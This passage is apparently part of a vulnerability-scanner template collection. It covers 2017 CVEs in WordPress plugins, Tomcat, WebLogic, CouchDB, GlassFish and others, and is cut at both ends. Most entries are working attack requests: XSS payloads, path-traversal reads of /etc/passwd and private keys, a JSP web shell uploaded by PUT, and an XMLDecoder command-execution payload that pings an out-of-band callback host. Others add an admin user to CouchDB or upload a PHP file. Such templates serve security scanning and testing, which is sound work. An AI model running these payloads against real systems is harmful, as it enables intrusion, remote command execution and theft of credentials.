<string>/etc/passwd</string>\n              <string>{{interactsh-url}}</string>\n                      </command>\n                      <redirectErrorStream>false</redirectErrorStream>\n                    </next>\n                  </iter>\n                  <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>asdasd</name>\n                  </filter>\n                  <next class=\"string\">asdasd</next>\n                </serviceIterator>\n                <lock/>\n              </cipher>\n              <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n              <ibuffer></ibuffer>\n              <done>false</done>\n              <ostart>0</ostart>\n              <ofinish>0</ofinish>\n              <closed>false</closed>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n</map>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["Debugging information","com.thoughtworks.xstream.converters.collections.MapConverter"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-18494","info":{"name":"Custom Search by BestWebSoft < 1.36 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-search-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Custom Search by\")"],"condition":"and"}]}]},{"id":"CVE-2017-10974","info":{"name":"Yaws 1.91 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C../ssl/yaws-key.pem"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), \"<html\")"]},{"type":"word","words":["BEGIN RSA PRIVATE KEY"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-16806","info":{"name":"Ulterius Server < 1.9.5.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12615","info":{"name":"Apache Tomcat Servers - Remote Code Execution","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/poc.jsp/"],"body":"<%@ page import=\"java.util.*,java.io.*\"%>\n<%\nif (request.getParameter(\"cmd\") != null) {\n        out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n        Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n        OutputStream os = p.getOutputStream();\n        InputStream in = p.getInputStream();\n        DataInputStream dis = new DataInputStream(in);\n        String disr = dis.readLine();\n        while ( disr != null ) {\n                out.println(disr);\n                disr = dis.readLine();\n                }\n        }\n%>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18490","info":{"name":"Contact Form Multi by BestWebSoft < 1.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/contact-form-multi/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Contact Form Multi by\")"],"condition":"and"}]}]},{"id":"CVE-2017-5982","info":{"name":"Kodi 17.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-3528","info":{"name":"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"],"matchers":[{"type":"word","part":"body","words":["noresize src=\"/\\interact.sh?configName="]}]}]},{"id":"CVE-2017-11586","info":{"name":"FineCMS <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?s=member&c=login&m=index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nback=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1\n","GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","part":"header","regex":["Refresh:(.*)url=http:\\/\\/interact\\.sh"]}]}]},{"id":"CVE-2017-16894","info":{"name":"Laravel <5.5.21 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.env"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["APP_NAME=","APP_DEBUG=","DB_PASSWORD="],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5631","info":{"name":"KMCIS CaseAware - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18529","info":{"name":"PromoBar by BestWebSoft < 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/promobar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"PromoBar by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-12635","info":{"name":"Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation","severity":"critical"},"requests":[{"raw":["PUT /_users/org.couchdb.user:poc HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\n\n{\n  \"type\": \"user\",\n  \"name\": \"poc\",\n  \"roles\": [\"_admin\"],\n  \"roles\": [],\n  \"password\": \"123456\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","Location:"]},{"type":"word","part":"body","words":["org.couchdb.user:poc","conflict","Document update conflict"]},{"type":"status","status":[201,409]}]}]},{"id":"CVE-2017-14524","info":{"name":"OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2017-18527","info":{"name":"Pagination by BestWebSoft < 1.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/pagination/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Pagination by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18562","info":{"name":"Error Log Viewer by BestWebSoft < 1.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/error-log-viewer/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Error Log Viewer by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-1000486","info":{"name":"Primetek Primefaces 5.x - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\npfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D\n"],"matchers":[{"type":"word","part":"header","words":["Mogwailabs: CHECKCHECK"]}]}]},{"id":"CVE-2017-7269","info":{"name":"Windows Server 2003 & IIS 6.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"OPTIONS","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"<DAV:sql>\", dasl)","regex(\"[\\d]+(,\\s+[\\d]+)?\", dav)","regex(\".*?PROPFIND\", public)","regex(\".*?PROPFIND\", allow)"],"condition":"or"},{"type":"word","part":"header","words":["IIS/6.0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18492","info":{"name":"Contact Form to DB by BestWebSoft < 1.5.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/contact-form-to-db/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Contact Form to DB by\")"],"condition":"and"}]}]},{"id":"CVE-2017-7855","info":{"name":"IceWarp WebMail 11.3.1.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["lang=\"\"><img src=x onerror=alert(document.domain)>","IceWarp"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18558","info":{"name":"Testimonials by BestWebSoft < 0.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-testimonials/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Testimonials by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18536","info":{"name":"WordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["forbidden - number in author","</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11629","info":{"name":"FineCMS <=5.0.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>p\u4e0d\u5b58\u5728"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-10075","info":{"name":"Oracle Content Server - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO","{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","ORACLE_QUERY"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000028","info":{"name":"Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd","{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-7615","info":{"name":"MantisBT <=2.30 - Arbitrary Password Reset/Admin Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantis/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash=","{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<input type=\"hidden\" name=\"account_update_token\" value=\"([a-zA-Z0-9_-]+)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18528","info":{"name":"PDF & Print by BestWebSoft < 1.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/pdf-print/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"PDF & Print by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-7391","info":{"name":"Magmi 0.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17562","info":{"name":"Embedthis GoAhead <3.6.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"endpoint":["admin","apply","non-CA-rev","cgitest","checkCookie","check_user","chn/liveView","cht/liveView","cnswebserver","config","configure/set_link_neg","configure/swports_adjust","eng/liveView","firmware","getCheckCode","get_status","getmac","getparam","guest/Login","home","htmlmgr","index","index/login","jscript","kvm","liveView","login","login.asp","login/login","login/login-page","login_mgr","luci","main","main-cgi","manage/login","menu","mlogin","netbinary","nobody/Captcha","nobody/VerifyCode","normal_userLogin","otgw","page","rulectl","service","set_new_config","sl_webviewer","ssi","status","sysconf","systemutil","t/out","top","unauth","upload","variable","wanstatu","webcm","webmain","webproc","webscr","webviewLogin","webviewLogin_m64","webviewer","welcome"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["environment variable","display library search paths"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9506","info":{"name":"Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-9140","info":{"name":"Reflected XSS - Telerik Reporting Module","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)"],"matchers-condition":"and","matchers":[{"type":"word","words":["#000000\"onload=\"prompt(1)","Telerik.ReportViewer.axd?name=Resources"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-6090","info":{"name":"PhpColl 2.5.1 Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137\n\n-----------------------------154934846911423734231554128137\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n-----------------------------154934846911423734231554128137--\n","GET /logos_clients/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-10271","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soapenv:Envelope\n    xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n    <soapenv:Header>\n        <work:WorkContext\n            xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n            <java version=\"1.4.0\" class=\"java.beans.XMLDecoder\">\n                <void class=\"java.lang.ProcessBuilder\">\n                    <array class=\"java.lang.String\" length=\"3\">\n                        <void index=\"0\">\n                            <string>/bin/bash</string>\n                        </void>\n                        <void index=\"1\">\n                            <string>-c</string>\n                        </void>\n                        <void index=\"2\">\n                            <string>ping -c 1 {{interactsh-url}}</string>\n                        </void>\n                    </array>\n                    <void method=\"start\"/></void>\n            </java>\n        </work:WorkContext>\n    </soapenv:Header>\n    <soapenv:Body/>\n</soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n  <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n      <soapenv:Header>\n          <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n              <java>\n                  <void class=\"java.lang.Thread\" method=\"currentThread\">\n                      <void method=\"getCurrentWork\">\n                          <void method=\"getResponse\">\n                              <void method=\"getServletOutputStream\">\n                                  <void method=\"flush\"/>\n                              </void>\n                              <void method=\"getWriter\"><void method=\"write\"><string>{{randstr}}</string></void></void>\n                          </void>\n                      </void>\n                  </void>\n              </java>\n          </work:WorkContext>\n      </soapenv:Header>\n      <soapenv:Body/>\n</soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex(\"<faultstring>java.lang.ProcessBuilder || <faultstring>0\", body)","contains(interactsh_protocol, \"dns\")","status_code == 500"],"condition":"and"},{"type":"dsl","dsl":["body == \"{{randstr}}\"","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-18500","info":{"name":"Social Buttons Pack by BestWebSof < 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/social-buttons-pack/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Social Buttons Pack by\")"],"condition":"and"}]}]},{"id":"CVE-2017-1000170","info":{"name":"WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"],"body":"dir=%2Fetc%2F&onlyFiles=true","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<li class='file ext_passwd'>","<a rel='/passwd'>passwd</a></li>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18598","info":{"name":"WordPress Qards - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/qards/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["console.log"]}]}]},{"id":"CVE-2017-11512","info":{"name":"ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\\..\\Windows\\win.ini","{{BaseURL}}/fosagent/repl/download-snapshot?name=..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2017-18566","info":{"name":"User Role by BestWebSoft < 1.5.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/user-role/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"User Role by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18557","info":{"name":"Google Maps by BestWebSoft < 1.3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-google-maps/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Google Maps by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-12637","info":{"name":"SAP NetWeaver Application Server Java 7.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.."],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["WEB-INF","META-INF"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18542","info":{"name":"Zendesk Help Center by BestWebSoft < 1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/zendesk-help-center/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Zendesk Help Center by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-15363","info":{"name":"Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<?php","'host'","'database'","'extConf'","'debug'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9822","info":{"name":"DotNetNuke 